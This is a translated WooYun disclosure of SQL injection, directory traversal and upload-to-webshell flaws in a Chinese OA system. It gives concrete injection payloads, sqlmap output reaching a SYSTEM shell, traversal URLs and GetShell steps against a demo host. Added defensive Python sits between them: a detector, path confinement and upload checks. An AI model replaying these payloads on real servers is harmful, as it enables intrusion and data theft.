
Vulnerability summary

Defect ID: wooyun-2014-066515

Title: Multiple DBA-privilege SQL injections, directory traversal and GetShell vulnerabilities in an OA system (bundled report)

Related vendor: CNCERT (National Internet Emergency Center)

Author: xfkxfk

Submitted: 2014-06-28 12:41

Fix deadline: 2014-09-26 12:42

Published: 2014-09-26 12:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-06-28: Details sent to the vendor, awaiting vendor handling
2014-07-03: Vendor confirmed; details visible to the vendor only
2014-07-06: Details opened to third-party security partners
2014-08-27: Details opened to core white hats and relevant domain experts
2014-09-06: Details opened to regular white hats
2014-09-16: Details opened to intern white hats
2014-09-26: Details made public

Brief description:

An OA system with several DBA-privilege SQL injections that give a shell directly, a directory traversal vulnerability, and a GetShell vulnerability, reported together.

Detailed description:

Guangzhou Mingjiang OA collaborative office system
Official site: http://www.yf1668.com/index.asp
The right-hand side of the official site lists a large number of customer case studies.
Official demo used for testing: http://112.124.41.23:38888/
0x001
First injection: unauthenticated SQL injection on the login page.
On the login page:

Link: http://112.124.41.23:38888/Default.aspx
POST data: __VIEWSTATE=%2FwEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ%2BW5v%2BW3nuW4guWQjeWwhui9r%2BS7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM%2B32pyEEFV0&TxtUserName=111111&TxtUserPwd=111111&ImageButton1.x=21&ImageButton1.y=10&XGuid=&XDigest=&__EVENTVALIDATION=%2FwEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r%2FjBs%2BiDZ4frcisA1TU5q4Rwb%2Bw9uNO


The username parameter TxtUserName is injectable (sqlmap output follows):

---
Place: POST
Parameter: TxtUserName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ+W5v+W3nuW4guWQjeWwhui9r+S7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM+32pyEEFV0&TxtUserName=123'; WAITFOR DELAY '0:0:5'--&TxtUserPwd=123&ImageButton1.x=55&ImageButton1.y=13&XGuid=&XDigest=&__EVENTVALIDATION=/wEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r/jBs+iDZ4frcisA1TU5q4Rwb+w9uNO
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTQ4MjcyMDExNg9kFgICAw9kFgQCCQ8PFgIeBFRleHQFJ+W5v+W3nuW4guWQjeWwhui9r+S7tuW8gOWPkeaciemZkOWFrOWPuGRkAgsPDxYEHwAFFWh0dHA6Ly93d3cueWYxNjY4LmNvbR4LTmF2aWdhdGVVcmwFFWh0dHA6Ly93d3cueWYxNjY4LmNvbWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlDaGVja0JveDEFDEltYWdlQnV0dG9uMVmZ1HOlflL80w9YAM+32pyEEFV0&TxtUserName=123' WAITFOR DELAY '0:0:5'--&TxtUserPwd=123&ImageButton1.x=55&ImageButton1.y=13&XGuid=&XDigest=&__EVENTVALIDATION=/wEWBwKDos64BALF1bSzCQLm8eKkDwKC5Ne7CQLSwpnTCAKL77ibAwLg3r/jBs+iDZ4frcisA1TU5q4Rwb+w9uNO
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
tables
---
[11:58:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:58:16] [INFO] fetching tables for database: FGOA
[11:58:16] [INFO] fetching number of tables for database 'FGOA'
[11:58:16] [INFO] resumed: 121
[11:58:16] [INFO] resumed: dbo.dtproperties
[11:58:16] [INFO] resumed: dbo.ERPAnPai
[11:58:16] [INFO] resumed: dbo.ERPBaoJia
[11:58:16] [INFO] resumed: dbo.ERPBaoXiao
[11:58:16] [INFO] resumed: dbo.ERPBBSBanKuai
[11:58:16] [INFO] resumed: dbo.ERPBBSTieZi
[11:58:16] [INFO] resumed: dbo.ERPBook
[11:58:16] [INFO] resumed: dbo.ERPBookJieHuan
[11:58:16] [INFO] resumed: dbo.ERPBuMen
[11:58:16] [INFO] resumed: dbo.ERPBuyChanPin
[11:58:16] [INFO] resumed: dbo.ERPBuyOrder
[11:58:16] [INFO] resumed: dbo.ERPCarBaoXian
[11:58:16] [INFO] resumed: dbo.ERPCarBaoYang
[11:58:16] [INFO] resumed: dbo.ERPCarInfo
[11:58:16] [INFO] resumed: dbo.ERPCarJiaYou
[11:58:16] [INFO] resumed: dbo.ERPCarLog
[11:58:16] [INFO] resumed: dbo.ERPCarShiYong
[11:58:16] [INFO] resumed: dbo.ERPCarWeiHu
[11:58:16] [INFO] resumed: dbo.ERPCarWeiZhang
[11:58:16] [INFO] resumed: dbo.ERPContract
[11:58:16] [INFO] resumed: dbo.ERPContractChanPin
[11:58:16] [INFO] resumed: dbo.ERPCrmSetting
[11:58:16] [INFO] resumed: dbo.ERPCustomFuWu
[11:58:16] [INFO] resumed: dbo.ERPCustomHuiFang
[11:58:16] [INFO] resumed: dbo.ERPCustomInfo
[11:58:16] [INFO] resumed: dbo.ERPCustomNeed
[11:58:16] [INFO] resumed: dbo.ERPCYDIC
[11:58:16] [INFO] resumed: dbo.ERPDangAn
[11:58:16] [INFO] resumed: dbo.ERPDanWeiInfo
[11:58:16] [INFO] resumed: dbo.ERPFileList
[11:58:16] [INFO] resumed: dbo.ERPGongGao
[11:58:16] [INFO] resumed: dbo.ERPGuDing
[11:58:16] [INFO] resumed: dbo.ERPGuDingJiLu
[11:58:16] [INFO] resumed: dbo.ERPH\x7fiBap
[11:58:16] [INFO] resumed: dbo.ERPHuiYuan
[11:58:16] [INFO] resumed: dbo.ERPJiangCheng
[11:58:16] [INFO] resumed: dbo.ERPJiangChengZhiDu
[11:58:16] [INFO] resumed: dbo.ERPJianLi
[11:58:16] [INFO] resumed: dbo.ERPJiaoSe
[11:58:16] [INFO] resumed: dbo.ERPJinDu
[11:58:16] [INFO] resumed: dbo.ERPJiXiao
[11:58:16] [INFO] resumed: dbo.ERPJiXiaoCanShu
[11:58:16] [INFO] resumed: dbo.ERPJSDIC
[11:58:16] [INFO] resumed: dbo.ERPJuanKu
[11:58:16] [INFO] resumed: dbo.ERPJXDetails
[11:58:16] [INFO] resumed: dbo.ERPKaoQin
[11:58:16] [INFO] resumed: dbo.ERPKaoQinSetting
......


This SQL injection yields a shell directly, running with SYSTEM privileges:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'nt authority\systgm'
os-shell>


Second SQL injection:
The WorkFlowID parameter is injectable (boolean-based, compare the two responses below).
http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 and 1=1&FormID=23

[Screenshot: 888.png]


http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 and 1=2&FormID=23

[Screenshot: 999.png]


That is enough to prove it; I will not dump data as further proof.
Third SQL injection:

Link: http://112.124.41.23:38888/SystemManage/SystemUser.aspx
POST data: __VIEWSTATE=%2FwEPDwUJNzQ5NTExNzY5D2QWAmYPZBYOAgYPDxYCHgdWaXNpYmxlaGRkAggPDxYCHwBoZGQCCg8PFgIfAGhkZAIMDw8WAh8AaGRkAg4PPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudGZkZAIYDw8WAh4EVGV4dAUBMWRkAhoPDxYCHwQFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBgUMSW1hZ2VCdXR0b240BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkRMJuhMoRzNdhfXN1TyYBGMVYJQ4%3D&TextBox2=&TextBox1=1111111111111%' and '%'='&ImageButton4.x=28&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWCwLHn7H3CgLs0fbZDALs0bLrBgLSwv2aBALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTKqv2Ep5xY8Ul5GGs0ASZH%2BZZkH


The TextBox1 parameter is injectable (a LIKE-clause string tautology, as the POST data shows).
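For the defender, the three injection points above share a small set of request-level signatures: the WAITFOR DELAY time-based probe and the stacked query in the login form, the "and 1=1" / "and 1=2" pair on WorkFlowID, and the "' and '%'='" string tautology on TextBox1. The following Python is an added example, not code from the report or from the product: it URL-decodes query strings and form bodies from request records and reports which signature each parameter value matches. The request records are constructed to mirror the report, and the record layout, field names and signature list are my own assumptions. Note that IIS W3C logs do not carry POST bodies, so records like these have to come from a WAF, reverse proxy or request-logging module.

```python
import re
from urllib.parse import parse_qs

# Signatures for the MSSQL injection styles seen in this report. The names and
# the regexes are assumptions made for this example.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked query",
     re.compile(r"'\s*;\s*(waitfor|exec|select|insert|update|delete|drop|declare)\b", re.I)),
    ("boolean tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
    ("string tautology", re.compile(r"'\s*(and|or)\s*'[^']*'\s*=\s*'", re.I)),
]

# Constructed request records mirroring the report (not real log data). The
# bodies are URL-encoded exactly as a browser or tool would send them.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/Default.aspx", "query": "",
     "body": "TxtUserName=123%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&TxtUserPwd=123"},
    {"method": "GET", "path": "/NWorkFlow/NWorkFlowReView.aspx",
     "query": "WorkFlowID=31+and+1%3D2&FormID=23", "body": ""},
    {"method": "POST", "path": "/SystemManage/SystemUser.aspx", "query": "",
     "body": "TextBox1=1111111111111%25%27+and+%27%25%27%3D%27&TxtPageSize=15"},
    {"method": "POST", "path": "/Default.aspx", "query": "",
     "body": "TxtUserName=alice&TxtUserPwd=s3cret"},  # benign login, should not fire
]


def classify_value(value):
    """Names of every signature that matches one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_request(req):
    """Return (location, parameter, signature) for each hit in one request.

    parse_qs does the percent- and plus-decoding, so the regexes run on the
    same text the database would have seen.
    """
    findings = []
    for location in ("query", "body"):
        params = parse_qs(req.get(location, ""), keep_blank_values=True)
        for param, values in params.items():
            for value in values:
                for sig in classify_value(value):
                    findings.append((location, param, sig))
    return findings


def scan_requests(requests):
    """Flatten findings across many requests, prefixed with the path for triage."""
    return [(req["path"],) + hit for req in requests for hit in scan_request(req)]


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

The first record fires twice on the same parameter (time-based and stacked), which is exactly the pairing sqlmap reported above; a single alert per parameter is enough for triage, but keeping both labels tells the responder that the database allows batched statements.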
0x002 Directory traversal vulnerability
The contents of the entire server can be listed, including the C: and D: drives.
http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=C:\Program Files

[Screenshot: 111.png]


http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\

[Screenshot: 222.png]


The current web site directory:
http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\OA_SITE\FGOA2014\Web9.2.2.7

[Screenshot: 333.png]
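The NetDisk page above accepts a drive-qualified SubDir and lists it as-is. The check that is missing is a path confinement step: the client value must be treated as a relative name under a fixed storage root, and anything that starts elsewhere (a drive letter, a rooted path, a UNC prefix) or climbs out (a ".." component) must be refused rather than repaired. The following Python is an added example of that check, not the vendor's code; it uses PureWindowsPath so the logic is lexical and runs on any host, and the storage root D:\OA_SITE\NetDisk is a hypothetical value, since the product's real path is not known from the report.

```python
from pathlib import PureWindowsPath

# Hypothetical storage root for the network-disk feature (assumed, not the
# product's actual location).
NETDISK_ROOT = PureWindowsPath(r"D:\OA_SITE\NetDisk")


def safe_subdir(root, user_subdir):
    """Map a client-supplied SubDir onto a directory under root.

    Returns the confined path, or None when the input tries to start or end
    up outside root. Pure path objects keep the check lexical: nothing is
    touched on disk, so it behaves the same on the server and in a test.
    """
    if user_subdir is None or user_subdir.strip() == "":
        return root
    if "\x00" in user_subdir:
        return None
    candidate = PureWindowsPath(user_subdir)
    # A drive letter (C:\... or C:foo), a rooted path (\foo) or a UNC prefix
    # (\\srv\share) all begin somewhere other than root: refuse outright.
    if candidate.drive or candidate.root:
        return None
    # pathlib folds "." components but keeps ".."; any ".." is a traversal attempt.
    if ".." in candidate.parts:
        return None
    # Windows ignores trailing dots and spaces when opening a name, so a
    # component such as "..  " still means the parent: strip and re-check.
    stripped = [p.rstrip(". ") for p in candidate.parts]
    if any(p in ("", "..") for p in stripped):
        return None
    joined = root.joinpath(*stripped)
    # Belt and braces: confirm the prefix is still root (NTFS is case-insensitive).
    root_parts = [p.lower() for p in root.parts]
    if [p.lower() for p in joined.parts[: len(root_parts)]] != root_parts:
        return None
    return joined


if __name__ == "__main__":
    for value in (r"C:\Program Files", "D:\\", r"..\..\Windows", r"Reports\2014"):
        print(repr(value), "->", safe_subdir(NETDISK_ROOT, value))
```

Even with this in place, the listing handler should run under an account that can only read the storage root; the report shows the injection already yields SYSTEM, and file-system permissions are the layer that limits what a traversal can reach when the application check fails.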


0x003 Arbitrary file upload GetShell
Log in with an account obtained through the SQL injection.
Desktop >> System Management >> File Upload Settings: the permitted upload file types can be changed here.

[Screenshot: 444.png]


Then go to Knowledge Documents, Personal Documents, Desktop >> File Center >> Add Personal File.

[Screenshot: 555.png]


Finally, the uploaded aspx file appears under Personal Documents; opening it reveals the shell URL.

[Screenshot: 666.png]


The resulting shell URL is:
http://112.124.41.23:38888/UploadFile/635395514206637345.aspx

[Screenshot: 777.png]
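The root cause in 0x003 is that the set of accepted upload types lives in an admin-editable settings page, so anyone holding an administrator session (here obtained through the SQL injection) can add aspx to it. The shell URL in the report also shows the server assigning its own numeric file name while keeping the client's extension. The following Python is an added example, not the product's code: it keeps a fixed deny-list of server-executable extensions that no configuration can override, lets the configurable list only narrow a fixed baseline, checks every segment of a multi-extension name, and derives the stored name entirely on the server. HARD_DENY and SAFE_BASELINE are assumed lists.

```python
import secrets

# Extensions the web server would execute or that alter IIS/ASP.NET behaviour.
# Fixed in code on purpose: an admin-editable "upload settings" page must not
# be able to re-enable any of them. (Assumed list, not from the product.)
HARD_DENY = {
    "aspx", "asp", "asa", "ashx", "asmx", "asax", "ascx", "soap", "rem",
    "config", "cs", "vb", "dll", "exe", "bat", "cmd", "com", "cer",
    "htaccess", "php", "jsp",
}

# Everything the application ever needs to accept. The configurable list from
# the admin UI can only narrow this set, never widen it. (Assumed list.)
SAFE_BASELINE = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt",
                 "jpg", "jpeg", "png", "gif", "zip"}


def extension_segments(original_name):
    """All dot-separated segments after the base name, lower-cased.

    Any path prefix is dropped, and trailing dots/spaces are removed because
    Windows ignores them when creating a file ("shell.aspx." is shell.aspx).
    """
    name = original_name.replace("\\", "/").rsplit("/", 1)[-1]
    name = name.lower().rstrip(". ")
    return name.split(".")[1:]


def check_upload(original_name, configured_types):
    """Return the canonical extension to store under, or None to reject.

    configured_types is the admin-editable list; it is intersected with
    SAFE_BASELINE so it cannot introduce new types, and HARD_DENY wins
    regardless of configuration.
    """
    segments = extension_segments(original_name)
    if not segments:
        return None  # no extension at all
    if any(seg in HARD_DENY for seg in segments):
        return None  # executable type anywhere in a multi-extension name
    effective = SAFE_BASELINE & {t.lower().lstrip(".") for t in configured_types}
    ext = segments[-1]
    return ext if ext in effective else None


def stored_name(original_name, configured_types):
    """Server-chosen file name: random base plus the vetted extension.

    Nothing from the client-supplied name reaches the disk except the
    extension that passed check_upload.
    """
    ext = check_upload(original_name, configured_types)
    if ext is None:
        raise ValueError("upload rejected: %r" % original_name)
    return "%s.%s" % (secrets.token_hex(16), ext)


if __name__ == "__main__":
    for name in ("report.pdf", "shell.aspx", "shell.aspx.jpg", "photo.JPG."):
        print(name, "->", check_upload(name, ["pdf", "jpg", "aspx"]))
```

Two further measures belong with this check: store uploads under a directory that the web server serves as static content only (no script execution), ideally outside the web root, and serve them back through a handler that sets the content type from the vetted extension rather than from the file name on disk.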

Proof of vulnerability:

[Screenshot: 777.png]

Fix recommendations:

Filter input strictly, control directory permissions strictly, and restrict uploads strictly.

Copyright notice: when reposting, please credit the source: xfkxfk@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-07-03 11:16

Vendor reply:

CNVD has confirmed the situation described on the DEMO site (no government or critical departments are involved; no verification against live Internet instances has been performed yet). CNVD will notify the software vendor through its public contact channels.

Latest status:

None yet